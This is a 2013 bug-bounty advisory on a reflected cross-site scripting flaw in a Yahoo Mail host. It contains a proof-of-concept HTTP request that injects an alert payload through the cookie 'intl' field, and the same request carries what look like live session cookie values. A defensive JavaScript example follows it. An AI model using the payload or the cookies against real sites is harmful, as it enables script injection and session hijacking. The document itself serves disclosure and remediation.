Advisory: Yahoo Bug Bounty Program Vulnerability #3 XSS on de-mg42.mail.yahoo.com
Advisory ID: SSCHADV2013-YahooBB-002
Author: Stefan Schurtz
Affected Software: Successfully tested on de-mg42.mail.yahoo.com
Vendor URL: http://yahoo.com/
Vendor Status: Not tested anymore
Bounty: nothing

==========================
Vulnerability Description
==========================

The 'intl' parameter on "https://de-mg42.mail.yahoo.com/" is prone to a cross-site scripting vulnerability.

==========================
PoC-Exploit
==========================

GET https://de-mg42.mail.yahoo.com/neo/launch?.rand=02j5el0e9m3mr
Host: de-mg42.mail.yahoo.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:25.0) Gecko/20100101 Firefox/25.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: YM.SREQs.schurtz=1; YM.NEO_114841791630661482=width=1920&height=874; B=aj6vf6l8j20rv&b=4&d=itbFpMNpYFMz7rPwe5JFum_ghxk-&s=i8&i=lvGlArFYMBIJ47eKw1fV; RMBX=aj6vf6l8j20rv&b=3&s=0k&t=59; V=v=0.90&cc=0&m=0; POPUPCHECK=1387130698530; adx=c322590@1386248182@1; T=z=bslqSBbANvSBRhTgC/z0ojCNjA2MAY2NjNPMzYwTjYxNDcxMT&a=QAE&sk=DAA8V8EU20nhMO&ks=EAAl0SH4Wfzh6QOSww.4WR97g--~E&d=c2wBTVRjeE53RXhNVFE0TkRFM09URTJNekEyTmpFME9ESS0BYQFRQUUBZwFYR1lLREFLVTdFWjU0SjY3QVJaUEYyMzZZSQFzY2lkAWJIVnpjWTF0aDdTVFREVFJLZUtxem4yeC5DWS0BYWMBQUVERkQ5VWQBdGlwAWQ1OTc3RAFzYwF3bAF6egFic2xxU0JBN0U-; F=a=5wuRvLEMvSo9VbE7dA3FBiS57T.ECJPqZKL7SqUSshaxgafrUTyTA2TfmjWAGc1FiTDSLSw-&b=_pW9; PH=l=de-DE&i=de&fn=K2_4Upj6Mg1KYq4D9FKN; SSL=v=1&s=ZKphB8TnY2DMWrNEU3WnQdsBp50y6G.DA.GMkzNJBkkaUPmmwLBscSpK5X5gJjBMR671vlpoBasj8HY6cXSNbA--&kv=0; ywadp100034076556=3167627385; fpc100034076556=ZavCj2Fd|aEGcHAwNaa|fses100034076556=|aEGcHAwNaa|ZavCj2Fd|fvis100034076556=|8Mo080oosT|8Mo080oosT|8Mo080oosT|8|8Mo080oosT|8Mo080oosT; ywadp1000357943879=4084605029; fpc1000357943879=ZbHoAVDq|0UsAOAwNaa|fses1000357943879=|0UsAOAwNaa|ZbHoAVDq|fvis1000357943879=|8Mo0807780|8Mo0807780|8Mo0807780|8|8Mo0807780|8Mo0807780; AO=o=0; YLS=v=1&p=1&n=0; ucs=bnas=0&eup=1; _br_uid_2=uid%3D9863339468277%3Av%3D10.6.1%3Ats%3D1386895411464%3Ahc%3D1; Y=v=1&n=d7kp7cfrj6gcm&l=i.i27khjp/o&p=m2evvde012000000&iz=&r=sd&lg=de-DE&intl=dec52a6"-alert(document.domain)-"c8d9133635e; U=mt=fnqDoZ2MhYjxjMnSZ.dZc46HZp7QbCgwGOhf97k-&ux=u2JrSB&un=d7kp7cfrj6gcm; ypcdb=cf2c3147a30c5264ccbae29c07ec31b3; YM=v=2&u=bTYqAOaoqXPwtE2NaDnywgQ.MkXnpDL1MkqqIA--&d=&f=AAA&t=3bKrSB&s=55nr; DK=v=2&p=NnwyMzMwfFZpcnR1YWx8RGVza3RvcCBCcm93c2VyfHdpbmRvd3MgbnR8NS4x
Connection: keep-alive

==========================
Disclosure Timeline
==========================

15-Dec-2013 - vendor informed by contact form (Yahoo Bug Bounty Program)
31-Dec-2013 - next message to the Yahoo Security Contact
04-Jan-2014 - feedback from vendor
04-Jan-2014 - vendor informed again about the three vulnerabilities
06-Jan-2014 - feedback from vendor
15-Jan-2014 - contact with Jeff Zingler (Threat Response@Yahoo)
16-Jan-2013 - contact with Jeff Zingler (Threat Response@Yahoo) // last contact

==========================
Credits
==========================

Vulnerability found and advisory written by Stefan Schurtz.

==========================
References
==========================

http://yahoo.com/
http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2013-YahooBB-003.txt
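
The PoC above carries its payload in the 'intl' field of the Y cookie. The following is an added example, not code from this advisory or from Yahoo: it shows the unsafe pattern beside an allow-listed, script-context-encoded one. Assumptions: the value is reflected into a double-quoted inline JavaScript string (inferred from the payload's shape), a valid 'intl' value is a two-letter code, and all function names and the fallback value are hypothetical.

```javascript
// Added illustration; not Yahoo's code. The sink (an inline, double-quoted JS string)
// is an assumption inferred from the shape of the PoC value.

// Split a '&'-separated key=value cookie value, the layout of the Y cookie in the PoC.
function parseSubCookie(value) {
  const fields = new Map(); // a Map avoids special keys such as __proto__
  for (const pair of value.split('&')) {
    const eq = pair.indexOf('=');
    if (eq > 0) fields.set(pair.slice(0, eq), pair.slice(eq + 1));
  }
  return fields;
}

// Vulnerable pattern: the raw value is concatenated into a JS string literal.
function renderUnsafe(intl) {
  return '<script>var conf = {intl: "' + intl + '"};</script>';
}

// Hardening step 1: allow-list. A two-letter code is assumed to be the valid format.
const DEFAULT_INTL = 'us'; // hypothetical fallback
function safeIntl(raw) {
  return typeof raw === 'string' && /^[a-z]{2}$/.test(raw) ? raw : DEFAULT_INTL;
}

// Hardening step 2: encode for the script context. JSON.stringify escapes quotes and
// backslashes; <, >, & and U+2028/U+2029 are escaped too, so the value cannot close
// the script element or terminate the line.
function jsStringLiteral(s) {
  return JSON.stringify(String(s)).replace(/[<>&\u2028\u2029]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

function renderSafe(rawIntl) {
  return '<script>var conf = {intl: ' + jsStringLiteral(safeIntl(rawIntl)) + '};</script>';
}

// Constructed sample: the last two fields of the Y cookie from the PoC request.
const yCookie = 'lg=de-DE&intl=dec52a6"-alert(document.domain)-"c8d9133635e';
const intl = parseSubCookie(yCookie).get('intl');
console.log(renderUnsafe(intl));    // the value closes the string literal
console.log(renderSafe(intl));      // rejected by the allow-list, default is used
console.log(jsStringLiteral(intl)); // encoding alone keeps the value inside the literal
```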